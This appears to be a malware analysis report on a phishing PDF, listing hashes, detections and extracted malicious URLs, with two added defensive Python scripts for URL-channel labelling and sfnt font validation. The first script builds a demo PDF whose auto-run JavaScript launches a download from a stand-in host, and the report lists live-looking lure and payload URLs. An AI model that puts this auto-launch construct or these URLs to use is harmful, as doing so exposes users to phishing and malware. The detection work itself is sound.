Malicious PDF — malware analysis report

Static analysis result for SHA-256 100b83de5dca0cb0…

Verdict: MALICIOUS
File type: PDF
Size: 65.4 KB
Created: 2021-04-01 18:09:34 +03:00
Authoring application: wkhtmltopdf 0.12.5 (via Qt 4.8.7)
MD5: 78e490e00217add1779b868c686d1eca
SHA-1: 0d927ea25378954b2b15a4a1b0ae3cd4130a2003
SHA-256: 100b83de5dca0cb0162dc5369afb6f9b30a003da0f2c3e3e197e35e7af3d5eb8
Risk score: 94

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.007 JavaScript

The file is flagged by ClamAV (signature Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0) and by the Nyx PDF classifier (malicious score 0.8603). It carries an external URI action, and among the extracted URLs https://vilenefex.ru/award?keyword=chemistry+periodic+table+with+names+pdf has the lure topic in its query string, so the document is most plausibly a "chemistry periodic table with names" lure that forwards the reader to a phishing or malware-distribution page. The page text itself is heavily obfuscated. Two caveats for the analyst: none of the heuristics below reports embedded JavaScript, so the T1059.007 mapping should be checked against the object tree (/JS, /JavaScript, /OpenAction, /AA entries) before it is relied on; and the remaining URLs are mostly paths to other PDFs on free-hosting sites and S3 buckets, plus font-licence links (scripts.sil.org/OFL, ascendercorp.com) that are consistent with the embedded font carved below, so the per-URL channel labels are what decide which of them are reachable through an action rather than merely present in page text.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.8603

Heuristics (3)

  • ClamAV: Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware under the signature above.
  • External URI (info, PDF_URI)
    The PDF contains an external URL action (an /A or /AA entry with /S /URI).
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://vilenefex.ru/award?keyword=chemistry+periodic+table+with+names+pdf
    • http://swiss-gear-top.xyz/447373384681p729.pdf
    • http://xuvaxujogilo.mygamesonline.org/redhat_ceph_storage.pdf
    • http://totakonepis.iblogger.org/fizasegonupixibi.pdf
    • https://cdn-cms.f-static.net/uploads/4475219/normal_5fd25fff00288.pdf
    • http://jitokinut.iblogger.org/rimworld_ice_sheet_challenge.pdf
    • http://3bureaureport.info/sony_pslx300usb_usb_stereo_turntable_softwarenas03.pdf
    • http://noxiliko.iblogger.org/10375059208.pdf
    • http://select-get.top/how_to_tell_if_bike_is_running_leandj9ax.pdf
    • https://static.s123-cdn-static.com/uploads/4377928/normal_5ffc222cc6751.pdf
    • http://static-get.top/jisokafoveweduxabkjgz.pdf
    • http://busijizi.medianewsonline.com/pathogenicity_test_of_fungi.pdf
    • http://www.ascendercorp.com/
    • http://www.ascendercorp.com/typedesigners.html
    • https://s3.amazonaws.com/jarirotexab/vapour_absorption_chiller_working_principle.pdf
    • https://s3.amazonaws.com/tasufagijaremo/johan_galtung_teoria_del_conflicto_libro.pdf
    • https://s3.amazonaws.com/woberiz/lidipines.pdf
    • http://rosevasejila.myartsonline.com/91201769000.pdf
    • http://bifovigavij.myartsonline.com/82770447166.pdf
    • http://tositasi.epizy.com/guzubikesotakizobo.pdf
    • http://tekefugenira.epizy.com/firefumosukumikune.pdf
    • https://s3.amazonaws.com/rokuwapesu/lexique_mathmatique_anglais_franais.pdf
    • http://scripts.sil.org/OFL
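A scanner that assigns each URL the channel it was reached through, as the EMBEDDED_URL note above describes, is added below as a worked example; it is not the analysis platform's code. It inflates FlateDecode streams and decodes hex-string /URI targets before scanning, follows /JS references to separate stream objects, and ranks self-firing actions (/JavaScript, /Launch) above /URI link actions and plain page text. The sample PDF, the domains and the JavaScript payload inside it are constructed for the demo.

```python
"""Label each URL in a PDF by the channel that reaches it.

Added example for this report; it is not the analysis platform's own code.
Scanning is regex-based over decoded object bodies, so it needs no external
parser. SAMPLE_PDF is constructed for the demo: the object syntax is what a
scanner meets in real files, but there is no xref table, so it is not a
conforming PDF and no viewer is expected to open it.
"""
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.S)
HEX_RE = re.compile(rb"<([0-9A-Fa-f][0-9A-Fa-f\s]*)>")    # PDF hex string, never <<
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")

# Action types that can fire a request by themselves; a URL that only appears
# in page text gets the "body" label instead.
ACTIONS = [
    (rb"/S\s*/JavaScript\b|/JS\b", "javascript"),
    (rb"/S\s*/Launch\b", "launch"),
    (rb"/S\s*/SubmitForm\b", "submit_form"),
    (rb"/S\s*/URI\b", "uri_action"),
]


def decode_body(body):
    """Inflate FlateDecode streams and rewrite hex strings as literal strings."""
    def inflate(m):
        if b"/FlateDecode" not in body:
            return m.group(1)
        try:
            return zlib.decompress(m.group(1))   # trailing EOL after the data is ignored
        except zlib.error:
            return m.group(1)                    # scan undecodable data as-is

    def unhex(m):
        digits = re.sub(rb"\s", b"", m.group(1))
        digits += b"0" * (len(digits) % 2)       # an odd final digit is padded with 0
        return b"(" + bytes.fromhex(digits.decode()) + b")"

    return HEX_RE.sub(unhex, STREAM_RE.sub(inflate, body))


def label_urls(pdf_bytes):
    """Return {url: set of channels} for every URL in the file."""
    objects = {int(m.group(1)): decode_body(m.group(2))
               for m in OBJ_RE.finditer(pdf_bytes)}
    # /JS frequently points at a separate stream object; URLs inside that
    # object belong to the JavaScript channel, not to the document body.
    js_streams = {int(n) for body in objects.values()
                  for n in re.findall(rb"/JS\s+(\d+)\s+\d+\s+R", body)}
    found = {}
    for num, body in objects.items():
        channel = "body"
        if num in js_streams:
            channel = "javascript"
        else:
            for pattern, name in ACTIONS:
                if re.search(pattern, body):
                    channel = name
                    break
        for url in URL_RE.findall(body):
            found.setdefault(url.decode("latin-1"), set()).add(channel)
    return found


def triage(pdf_bytes):
    """Rows of (url, sorted channels), self-firing channels first."""
    rank = {"javascript": 0, "launch": 0, "submit_form": 1, "uri_action": 1, "body": 2}
    rows = [(url, sorted(chs)) for url, chs in label_urls(pdf_bytes).items()]
    return sorted(rows, key=lambda row: (min(rank[c] for c in row[1]), row[0]))


# --- constructed sample (domains and payload invented for the demo) ----------
LURE = b"https://lure.example/award?keyword=chemistry+periodic+table"
JS_PAYLOAD = b'app.launchURL("http://stage2.example/drop.pdf", true);'
JS_STREAM = zlib.compress(JS_PAYLOAD)
PAGE_TEXT = b"BT /F1 12 Tf (see http://text.example/notes.pdf) Tj ET"
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] /Contents 6 0 R >> endobj\n"
    # link annotation whose target is a hex string, hiding it from a plain grep
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792]"
    b" /A << /S /URI /URI <" + LURE.hex().encode() + b"> >> >> endobj\n"
    # document-open action whose JavaScript lives in a compressed stream object
    b"5 0 obj << /S /JavaScript /JS 7 0 R >> endobj\n"
    b"6 0 obj << /Length " + str(len(PAGE_TEXT)).encode() + b" >>\nstream\n"
    + PAGE_TEXT + b"\nendstream\nendobj\n"
    b"7 0 obj << /Length " + str(len(JS_STREAM)).encode()
    + b" /Filter /FlateDecode >>\nstream\n" + JS_STREAM + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for url, channels in triage(SAMPLE_PDF):
        print("%-12s %s" % (",".join(channels), url))
```

Applied to a real sample, this labelling is what separates the two informational heuristics above: a URL that only reaches the body list is context, one that reaches the uri_action or javascript list is a detonation target. Object streams (/ObjStm) and other filters (LZW, ASCIIHex) are not decoded here and would need the same treatment before the scan.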

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: font_00_sfnt_off0000de6d.bin
SHA-256: 1591321cf6f0408424bc6d85e37fca7adae5ee1c142dadf2bf8a3803fa95b5cb
Kind: pdf-font-stream
Source: PDF embedded font (sfnt) at offset 0xDE6D
Size: 5540 bytes
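The artifact above was carved as an sfnt font stream. A checker for such a blob, added here as an example rather than taken from the analysis tool, parses the offset table and table directory and reports records that point past the blob, overlap each other, fail the sfnt checksum or miss the head magic number. Both fonts it runs on are built inside the file; nothing here is derived from the carved sample.

```python
"""Sanity-check an sfnt font blob carved out of a PDF.

Added example for this report, not the analysis platform's code. An sfnt
container (TrueType/OpenType) opens with a 4-byte scaler type, a 16-byte
offset table and then numTables 16-byte records (tag, checksum, offset,
length). A carved font whose records point outside the blob, overlap each
other or carry wrong checksums is exactly the kind of input a viewer's font
parser has to survive, so those are the checks done here. DEMO_FONT and
TAMPERED_FONT are constructed below, not taken from the sample.
"""
import struct

SCALER_TYPES = {
    b"\x00\x01\x00\x00": "TrueType",
    b"true": "TrueType (Apple)",
    b"OTTO": "OpenType/CFF",
}
HEAD_MAGIC = 0x5F0F3CF5


def table_checksum(data):
    """sfnt table checksum: big-endian uint32 sum over the table, zero-padded to 4."""
    data += b"\0" * (-len(data) % 4)
    return sum(struct.unpack(">%dI" % (len(data) // 4), data)) & 0xFFFFFFFF


def parse_sfnt(blob):
    """Return {'kind', 'tables': [(tag, offset, length)], 'problems': [...]}."""
    problems = []
    if len(blob) < 12:
        return {"kind": None, "tables": [], "problems": ["blob shorter than offset table"]}
    kind = SCALER_TYPES.get(blob[:4])
    if kind is None:
        problems.append("unknown scaler type %r" % blob[:4])
    num_tables = struct.unpack(">H", blob[4:6])[0]
    dir_end = 12 + 16 * num_tables
    if dir_end > len(blob):
        problems.append("directory claims %d tables, blob holds at most %d"
                        % (num_tables, (len(blob) - 12) // 16))
        num_tables = (len(blob) - 12) // 16
    tables = []
    for i in range(num_tables):
        rec = 12 + 16 * i
        tag, stored, offset, length = struct.unpack(">4sIII", blob[rec:rec + 16])
        tag = tag.decode("latin-1")
        tables.append((tag, offset, length))
        if offset + length > len(blob):
            problems.append("%s: offset %d + length %d exceeds blob size %d"
                            % (tag, offset, length, len(blob)))
            continue                      # nothing safe to read for this table
        if offset < dir_end:
            problems.append("%s: table data overlaps the directory" % tag)
        for other, o_off, o_len in tables[:-1]:
            if offset < o_off + o_len and o_off < offset + length:
                problems.append("%s: overlaps %s" % (tag, other))
        data = blob[offset:offset + length]
        if tag == "head":
            if len(data) < 16 or struct.unpack(">I", data[12:16])[0] != HEAD_MAGIC:
                problems.append("head: magic number is not 0x%08X" % HEAD_MAGIC)
            data = data[:8] + b"\0\0\0\0" + data[12:]   # checkSumAdjustment is excluded
        computed = table_checksum(data)
        if computed != stored:
            problems.append("%s: stored checksum 0x%08X, computed 0x%08X"
                            % (tag, stored, computed))
    return {"kind": kind, "tables": tables, "problems": problems}


def build_sfnt(scaler, tables):
    """Assemble a minimal sfnt from {tag: bytes}; demo input only (search fields zeroed)."""
    out = bytearray(scaler + struct.pack(">HHHH", len(tables), 0, 0, 0))
    body = bytearray()
    base = 12 + 16 * len(tables)
    for tag, data in sorted(tables.items()):
        out += struct.pack(">4sIII", tag, table_checksum(data), base + len(body), len(data))
        body += data + b"\0" * (-len(data) % 4)
    return bytes(out + body)


# head table: version, fontRevision, checkSumAdjustment, magic, flags, unitsPerEm, rest zero
HEAD = struct.pack(">IIIIHH", 0x00010000, 0x00010000, 0, HEAD_MAGIC, 0, 1000) + b"\0" * 34
DEMO_FONT = build_sfnt(b"\x00\x01\x00\x00",
                       {b"head": HEAD, b"cmap": b"\0\0\0\0", b"name": b"demo"})
# same font with the first record's length (cmap, bytes 24..28) pushed past the blob
TAMPERED_FONT = DEMO_FONT[:24] + struct.pack(">I", 0x7FFFFFFF) + DEMO_FONT[28:]

if __name__ == "__main__":
    for name, blob in (("demo", DEMO_FONT), ("tampered", TAMPERED_FONT)):
        info = parse_sfnt(blob)
        print(name, info["kind"], [t[0] for t in info["tables"]], info["problems"] or "clean")
```

To check the carved artifact, read font_00_sfnt_off0000de6d.bin into bytes and pass it to parse_sfnt. A clean result only says the container is self-consistent; it says nothing about the glyph programs or CFF data inside the tables.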